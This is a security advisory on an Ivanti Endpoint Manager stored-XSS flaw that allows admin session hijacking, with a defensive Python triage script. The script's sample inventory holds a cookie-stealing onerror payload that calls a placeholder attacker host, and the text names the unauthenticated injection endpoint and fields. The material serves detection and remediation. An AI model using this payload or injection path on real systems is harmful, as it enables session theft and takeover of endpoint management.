🚨 CRITICAL intel

CVE-2025-10573 - Ivanti EPM Stored XSS Enables Admin Session Hijack

Ivanti Endpoint Manager (EPM) has a critical stored cross-site scripting flaw (CVE-2025-10573, CVSS 9.0) that lets an unauthenticated attacker hijack administrator sessions. The attacker injects JavaScript through the unauthenticated 'incomingdata' web API, which accepts device scan data without validating it. A payload embedded in the Device ID, Display Name, or OS Name field is stored and executes in the browser of any admin who views the affected dashboard page. With a stolen admin session the attacker controls endpoint policies enterprise-wide, can push malicious updates, or can disable security controls. Affects EPM 2024 SU4 and earlier. Patched December 9 in EPM 2024 SU4 SR1. This is the classic XSS-to-admin-compromise chain: the attacker never authenticates, and because the payload runs inside an administrator's already-authenticated browser session, MFA enforced at login offers no protection. No authentication is required for the initial injection.

🎯CORTEX Protocol Intelligence Assessment

Business Impact: Compromise of the endpoint management platform gives the attacker control over every managed device: install software, disable antivirus, exfiltrate data, deploy ransomware. Because the injection vector is unauthenticated, any EPM instance whose incomingdata endpoint is network-reachable is exposed. Because the attacker rides an administrator's existing session rather than logging in, authentication-time controls such as MFA do not stop the attack.

Technical Context: CVE-2025-10573 is a stored cross-site scripting flaw in the Ivanti EPM incomingdata API endpoint (T1059.007 JavaScript, T1185 Browser Session Hijacking). The attacker POSTs a payload to /incomingdata/postcgi.exe without authentication. The payload is stored in the device database and rendered without output encoding in the admin dashboard (frameset.aspx, db_frameset.aspx). When an admin views the affected page, the JavaScript executes in the admin's origin, steals session cookies, and gives the attacker full admin access. Note that an HttpOnly flag on the session cookie limits cookie theft but does not close the hole: script running in the admin's page can still issue authenticated requests to the console directly, so the fix is output encoding (and input validation) in the application, not cookie flags alone.

Strategic Intelligence Guidance

  • Upgrade all Ivanti Endpoint Manager installations to version 2024 SU4 SR1 or later on an emergency basis, prioritizing systems reachable from outside dedicated admin networks.
  • Restrict access to the EPM web console using VPN, IP allowlists and strong authentication. The /incomingdata/postcgi.exe endpoint must remain reachable by managed agents, so confine it to the networks those agents actually use and block it from the internet and other untrusted segments; treat this as a compensating control, not a substitute for the patch.
  • Monitor for suspicious device registrations, unusual endpoint names, and anomalous administrative actions that could indicate stored XSS exploitation and admin session hijacking.
  • Incorporate unauthenticated API endpoints such as incomingdata into application security testing and code review processes, ensuring input validation and output encoding for user-controlled fields.
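The following is an added triage script, not Ivanti's code and not from the original advisory, that puts the last two recommendations into practice: it scans exported device inventory for the three payload-carrying fields named above, flags POSTs to /incomingdata/postcgi.exe that did not originate from the agent subnets, and shows the unsafe-versus-encoded rendering of a device name. Assumptions are labelled in the comments: the inventory export shape, the IIS W3C log field order, the agent subnet, and all sample records and log lines are constructed for the example.

```python
"""Stored-XSS triage for EPM device inventory and web logs (added example).

Assumptions (not from the advisory): inventory is exported as dicts with the
keys in INVENTORY_FIELDS; the web server writes IIS W3C logs with the field
order in LOG_FIELDS; legitimate agents live in AGENT_NETS.
"""
import html
import ipaddress
import re
from typing import Dict, Iterable, List

# The three fields the advisory names as payload carriers.
INVENTORY_FIELDS = ("device_id", "display_name", "os_name")

# Markup or script that has no business in a hostname or OS string.
XSS_INDICATOR = re.compile(
    r"<\s*/?\s*[a-z!][a-z0-9-]*"   # tag opener: <script, <img, </td, <!--
    r"|javascript\s*:"             # javascript: URL scheme
    r"|\bon[a-z]+\s*="             # inline event handler: onerror=, onload=
    r"|&#x?[0-9a-f]+;?"            # numeric entity used to smuggle '<'
    r"|%3c|%3e|\\u003c|\\x3c",     # URL- or JS-escaped angle brackets
    re.IGNORECASE,
)

# Assumed IIS W3C field order for the constructed log below.
LOG_FIELDS = ("date", "time", "s-ip", "cs-method", "cs-uri-stem", "cs-uri-query",
              "s-port", "cs-username", "c-ip", "cs(User-Agent)", "sc-status")
AGENT_NETS = [ipaddress.ip_network("10.20.0.0/16")]  # assumed agent subnet
INCOMINGDATA_STEM = "/incomingdata/postcgi.exe"


def scan_inventory(records: Iterable[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return one finding per inventory field containing an XSS indicator."""
    findings = []
    for rec in records:
        for field in INVENTORY_FIELDS:
            match = XSS_INDICATOR.search(str(rec.get(field, "")))
            if match:
                findings.append({"device_id": rec.get("device_id", ""),
                                 "field": field, "indicator": match.group(0)})
    return findings


def scan_web_log(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Flag POSTs to the incomingdata endpoint from outside the agent subnets."""
    findings = []
    for line in lines:
        if not line.strip() or line.startswith("#"):
            continue                      # skip blank lines and W3C directives
        parts = line.split()
        if len(parts) < len(LOG_FIELDS):
            continue
        entry = dict(zip(LOG_FIELDS, parts))
        if entry["cs-method"] != "POST" or entry["cs-uri-stem"].lower() != INCOMINGDATA_STEM:
            continue
        src = ipaddress.ip_address(entry["c-ip"])
        if not any(src in net for net in AGENT_NETS):
            findings.append({"c-ip": entry["c-ip"], "ua": entry["cs(User-Agent)"],
                             "reason": "incomingdata POST from outside agent subnets"})
    return findings


def render_cell_unsafe(value: str) -> str:
    """The vulnerable pattern: raw interpolation of a device field into HTML."""
    return f"<td>{value}</td>"


def render_cell_safe(value: str) -> str:
    """The fix the guidance calls for: HTML-encode before rendering."""
    return f"<td>{html.escape(value, quote=True)}</td>"


# Constructed sample data: one clean device, one scripted display name,
# one entity-encoded device ID.
SAMPLE_INVENTORY = [
    {"device_id": "WS-0412", "display_name": "FIN-LAPTOP-07",
     "os_name": "Microsoft Windows 11 Enterprise"},
    {"device_id": "WS-0413",
     "display_name": "<img src=x onerror=\"fetch('https://attacker.invalid/c?'+document.cookie)\">",
     "os_name": "Microsoft Windows 10 Pro"},
    {"device_id": "SRV-&#x3c;script&#x3e;", "display_name": "DB-01",
     "os_name": "Windows Server 2022"},
]

# Constructed IIS-style log: one agent POST, one POST from an external address.
SAMPLE_LOG = [
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status",
    "2025-12-10 08:14:02 10.20.5.10 POST /incomingdata/postcgi.exe - 443 - 10.20.33.7 EPM-Agent/2024 200",
    "2025-12-10 08:14:09 10.20.5.10 POST /incomingdata/postcgi.exe - 443 - 203.0.113.45 python-requests/2.32 200",
]

if __name__ == "__main__":
    for f in scan_inventory(SAMPLE_INVENTORY) + scan_web_log(SAMPLE_LOG):
        print(f)
    print(render_cell_safe(SAMPLE_INVENTORY[1]["display_name"]))
```

Run it against a real inventory export and IIS log by replacing the two SAMPLE_ constants; a hit in scan_inventory is a strong signal that an injection already landed, while a hit in scan_web_log identifies the source that sent it. The indicator regex is deliberately broad (it will flag a legitimate entity-escaped name), since a hostname that contains markup at all is worth a look.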

CVEs

CVE-2025-10573

Vendors

Ivanti
Ivanti Endpoint Manager

Targets

Endpoint management servers
Enterprise Windows fleets
IT operations teams